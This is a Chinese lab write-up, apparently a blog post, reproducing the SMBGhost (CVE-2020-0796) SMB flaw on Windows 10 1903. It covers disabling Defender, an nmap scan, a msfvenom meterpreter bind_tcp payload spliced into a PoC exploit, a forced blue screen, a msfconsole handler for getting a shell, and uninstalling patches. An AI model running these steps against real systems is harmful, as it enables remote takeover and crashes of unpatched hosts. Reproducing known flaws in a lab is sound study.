永恒之黑漏洞复现

一、实验环境搭建
系统镜像:
ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/
建议使用迅雷下载,安装版本选win10专业版

安装完后记得一定要关闭defender,防火墙,保证win10和kali可以互ping
在这里插入图片描述

检测工具CVE-2020-0796-Scanner:
https://pan.baidu.com/s/1U4CHnUhgf1KN3JhCjLbGhw 提取码:b2pd
POC:
https://pan.baidu.com/s/18E5q1S33d-Fw8M6GRkZzfw 提取码:xrnw
二、怎么关闭defenderwin10杀毒 关闭defenderwin10杀毒教程
 1、首先按下快捷键“ win+r ”打开运行输入“ gpedit.msc ”。
在这里插入图片描述

2、然后即可进入“ 本地组策略编辑器 ”。
在这里插入图片描述

3、依次展开“ 管理模板 —> windows组件 —> windows defender防病毒程序 ”,
  双击右侧的“ 关闭defender防病毒程序 ”。
在这里插入图片描述

4、最后点击上方的“ 已启用 ”即可成功关闭。
在这里插入图片描述

三、漏洞验证
Kali主机对目标进行扫描 nmap -sS 192.168.162.2
在这里插入图片描述

说明已开放445端口,可利用
然后使用漏洞扫描工具CVE-2020-0796-Scanner检测漏洞
在这里插入图片描述

1)打开kali,放入SMBGhost_RCE_PoC-master.zip到/root下,解压
2)首先使用msfvenom生成一个python类型的shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b ‘\x00’ -i 1 -f python
在这里插入图片描述

3)将输出的内容复制,拷贝到exploit.py中,剪切替换原先的USER_PAYLOAD部分
在这里插入图片描述

4)蓝屏测试
再开一个终端,先执行 chmod +x exploit.py
再执行python3 exploit.py -ip 192.168.25.147
在这里插入图片描述

按回车可以触发蓝屏
在这里插入图片描述

此时会触发Win10蓝屏
5)接着msfconsole开启监听端口
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4488
set rhost 192.168.25.147 (Win10地址)
Run
在这里插入图片描述

继续使用python3 exploit.py -ip 192.168.25.147这时可以得到shell了
在这里插入图片描述在这里插入图片描述

四、总结
如果利用失败,有以下几点需要注意
1、看下是win10不是开启了自动更新,若有把他关闭
若最近已被装了补丁,则可在卸载程序里将补丁卸载重启即可
在这里插入图片描述

2、看SMB有没有都开启
在这里插入图片描述

3、看有没有关闭防火墙
4、看win10系统版本是不是1903
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值